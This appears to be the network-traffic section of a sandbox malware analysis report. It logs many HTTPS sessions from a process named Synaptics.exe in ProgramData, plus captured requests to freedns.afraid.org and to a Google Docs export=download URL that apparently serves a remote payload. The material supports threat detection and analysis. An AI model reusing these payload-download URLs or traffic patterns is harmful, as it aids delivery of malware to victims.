                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        27192.168.2.349766142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        270192.168.2.350056142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        271192.168.2.350057142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        272192.168.2.350058142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        273192.168.2.350059142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        274192.168.2.350060142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        275192.168.2.350061142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        276192.168.2.350062142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        277192.168.2.350065142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        278192.168.2.350066142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        279192.168.2.350067142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        28192.168.2.349767142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        280192.168.2.350068142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        281192.168.2.350069142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        282192.168.2.350070142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        283192.168.2.350071142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        284192.168.2.350072142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        285192.168.2.350073142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        286192.168.2.350074142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        287192.168.2.350075142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        288192.168.2.350076142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        289192.168.2.350077142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        29192.168.2.349769142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        290192.168.2.350078142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        291192.168.2.350079142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        292192.168.2.350080142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        293192.168.2.350081142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        294192.168.2.350082142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        295192.168.2.350084142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        296192.168.2.350085142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        297192.168.2.350086142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        298192.168.2.350087142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        299192.168.2.350088142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        3192.168.2.349737142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        30192.168.2.349771142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        300192.168.2.350089142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        301192.168.2.350090142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        302192.168.2.34973569.42.215.25280C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        May 17, 2022 13:31:29.115843058 CEST817OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                                                                        User-Agent: MyApp
                                                                                                                                                                                        Host: freedns.afraid.org
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        May 17, 2022 13:31:29.329132080 CEST819INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:28 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                        Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        31192.168.2.349773142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        32192.168.2.349776142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        33192.168.2.349778142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        34192.168.2.349780142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        35192.168.2.349781142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        36192.168.2.349783142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        37192.168.2.349784142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        38192.168.2.349785142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        39192.168.2.349786142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        4192.168.2.349739142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        40192.168.2.349788142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        41192.168.2.349789142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        42192.168.2.349790142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        43192.168.2.349791142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        44192.168.2.349792142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        45192.168.2.349793142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        46192.168.2.349794142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        47192.168.2.349795142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        48192.168.2.349796142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        49192.168.2.349798142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        5192.168.2.349740142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        50192.168.2.349799142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        51192.168.2.349800142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        52192.168.2.349801142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        53192.168.2.349803142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        54192.168.2.349804142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        55192.168.2.349805142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        56192.168.2.349806142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        57192.168.2.349807142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        58192.168.2.349808142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        59192.168.2.349811142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        6192.168.2.349741142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        60192.168.2.349812142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        61192.168.2.349813142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        62192.168.2.349814142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        63192.168.2.349815142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        64192.168.2.349816142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        65192.168.2.349817142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        66192.168.2.349818142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        67192.168.2.349819142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        68192.168.2.349820142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        69192.168.2.349821142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        7192.168.2.349742142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        70192.168.2.349822142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        71192.168.2.349823142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        72192.168.2.349824142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        73192.168.2.349825142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        74192.168.2.349826142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        75192.168.2.349827142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        76192.168.2.349828142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        77192.168.2.349830142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        78192.168.2.349831142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        79192.168.2.349832142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        8192.168.2.349743142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        80192.168.2.349833142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        81192.168.2.349834142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        82192.168.2.349835142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        83192.168.2.349836142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        84192.168.2.349837142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        85192.168.2.349838142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        86192.168.2.349839142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        87192.168.2.349842142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        88192.168.2.349843142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        89192.168.2.349844142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        9192.168.2.349744142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        90192.168.2.349845142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        91192.168.2.349846142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        92192.168.2.349847142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        93192.168.2.349848142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        94192.168.2.349849142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        95192.168.2.349850142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        96192.168.2.349851142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        97192.168.2.349852142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        98192.168.2.349853142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        99192.168.2.349854142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        0192.168.2.349732142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:28 UTC0OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:28 UTC0INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:28 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
